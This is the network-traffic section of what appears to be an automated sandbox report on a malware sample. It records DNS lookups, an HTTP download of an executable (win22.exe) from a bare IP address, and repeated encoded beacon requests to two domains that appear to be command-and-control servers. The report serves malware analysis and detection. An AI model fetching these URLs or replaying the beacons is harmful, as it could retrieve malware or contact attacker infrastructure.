Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.lkprimeusa.com |
CNAME
www156.wixdns.net
CNAME
balancer.wixdns.net
|
34.80.190.141 |
www.lzcxkj888.com | 23.226.67.245 |
- UDP Requests
-
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62326 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://192.3.122.133/dubem/win22.exe
REQUEST
RESPONSE
BODY
GET /dubem/win22.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: 192.3.122.133
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 05 Aug 2021 01:25:54 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.8
Last-Modified: Wed, 04 Aug 2021 03:17:28 GMT
ETag: "ca400-5c8b33e085f7f"
Accept-Ranges: bytes
Content-Length: 828416
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET
200
http://www.lzcxkj888.com/d6b4/?iN=uPVo0pzI0ArH7X144sNYCwKddg947NU05e9iK1uMCjx4rBqU+bHxotmYz5U69MC02jCRFKsM&lH5d=YTChiXcp6fKlAhF
REQUEST
RESPONSE
BODY
GET /d6b4/?iN=uPVo0pzI0ArH7X144sNYCwKddg947NU05e9iK1uMCjx4rBqU+bHxotmYz5U69MC02jCRFKsM&lH5d=YTChiXcp6fKlAhF HTTP/1.1
Host: www.lzcxkj888.com
Connection: close
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Aug 2021 01:27:25 GMT
Content-Type: text/html; charset=gbk
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
GET
301
http://www.lkprimeusa.com/d6b4/?iN=07EUc8qASaG/3VfQRg4EEw3YL+3tn2VFwz036mivi72SnUpvja52lyVORGrcG9Bm3ip+G+Yj&lH5d=YTChiXcp6fKlAhF
REQUEST
RESPONSE
BODY
GET /d6b4/?iN=07EUc8qASaG/3VfQRg4EEw3YL+3tn2VFwz036mivi72SnUpvja52lyVORGrcG9Bm3ip+G+Yj&lH5d=YTChiXcp6fKlAhF HTTP/1.1
Host: www.lkprimeusa.com
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Thu, 05 Aug 2021 01:27:46 GMT
Content-Length: 0
Connection: close
location: https://www.lkprimeusa.com/d6b4?iN=07EUc8qASaG%2F3VfQRg4EEw3YL+3tn2VFwz036mivi72SnUpvja52lyVORGrcG9Bm3ip+G+Yj&lH5d=YTChiXcp6fKlAhF
strict-transport-security: max-age=120
x-wix-request-id: 1628126866.13597594310527661
Age: 0
Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=ae1
X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVh3CYTQPN9PHdv658G6XagD,m0j2EEknGIVUW/liY8BLLujeOqjPZevZ5WsEFCNehLjkSKZSxqn1WKO11csTt54x,2d58ifebGbosy5xc+FRaltXMDNVZm2o1ZUDAEcOojxAVbBDievUvOGROwfViA81m3csFzt1a1bFKmxu7CdYYyViB5QmpRe2J37zq9nDD6cs=,2UNV7KOq4oGjA5+PKsX47MvztbMJ59fC/Ek4VcyRd7w=,PT82wsLgDzHCy2wOd3lRYpVYvl9j0H+l7VNjJl0nyaXz2QBwcPOgJIdGvBlDiPaw,pqHnkoPJJ3Zv4jzYgXz9s0ZZ839pYMuyCGL67gIZebU6r4iKYjcr0uY9GOnot13oB4ausamOe+AYYTbXhFqDpw==
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Server: Pepyaka/1.19.0
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts